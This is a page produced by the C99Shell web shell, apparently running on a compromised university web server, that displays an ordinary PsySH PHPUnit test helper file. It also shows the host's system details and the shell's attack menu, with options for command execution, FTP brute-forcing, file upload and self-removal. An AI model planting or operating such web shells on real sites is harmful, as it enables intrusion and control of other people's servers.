!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/psy/psysh/test/Psy/Test/CodeCleaner/   drwxr-xr-x
Free 117.27 GB of 200.55 GB (58.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CodeCleanerTestCase.php (2.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Psy Shell.
 *
 * (c) 2012-2015 Justin Hileman
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Psy\Test\CodeCleaner;

use 
PhpParser\NodeTraverser;
use 
PhpParser\Parser;
use 
PhpParser\PrettyPrinter\Standard as Printer;
use 
Psy\CodeCleaner\CodeCleanerPass;
use 
Psy\Exception\ParseErrorException;
use 
Psy\ParserFactory;

class 
CodeCleanerTestCase extends \PHPUnit_Framework_TestCase
{
    protected 
$pass;
    protected 
$traverser;
    private 
$parser;
    private 
$printer;

    protected function 
setPass(CodeCleanerPass $pass)
    {
        
$this->pass $pass;
        if (!isset(
$this->traverser)) {
            
$this->traverser = new NodeTraverser();
        }
        
$this->traverser->addVisitor($this->pass);
    }

    protected function 
parse($code$prefix '<?php ')
    {
        
$code $prefix $code;
        try {
            return 
$this->getParser()->parse($code);
        } catch (\
PhpParser\Error $e) {
            if (!
$this->parseErrorIsEOF($e)) {
                throw 
ParseErrorException::fromParseError($e);
            }

            try {
                
// Unexpected EOF, try again with an implicit semicolon
                
return $this->getParser()->parse($code ';');
            } catch (\
PhpParser\Error $e) {
                return 
false;
            }
        }
    }

    protected function 
traverse(array $stmts)
    {
        return 
$this->traverser->traverse($stmts);
    }

    protected function 
prettyPrint(array $stmts)
    {
        return 
$this->getPrinter()->prettyPrint($stmts);
    }

    protected function 
assertProcessesAs($from$to)
    {
        
$stmts $this->parse($from);
        
$stmts $this->traverse($stmts);
        
$this->assertEquals($to$this->prettyPrint($stmts));
    }

    private function 
getParser()
    {
        if (!isset(
$this->parser)) {
            
$parserFactory = new ParserFactory();
            
$this->parser  $parserFactory->createParser();
        }

        return 
$this->parser;
    }

    private function 
getPrinter()
    {
        if (!isset(
$this->printer)) {
            
$this->printer = new Printer();
        }

        return 
$this->printer;
    }

    private function 
parseErrorIsEOF(\PhpParser\Error $e)
    {
        
$msg $e->getRawMessage();

        return (
$msg === 'Unexpected token EOF') || (strpos($msg'Syntax error, unexpected EOF') !== false);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0237 ]--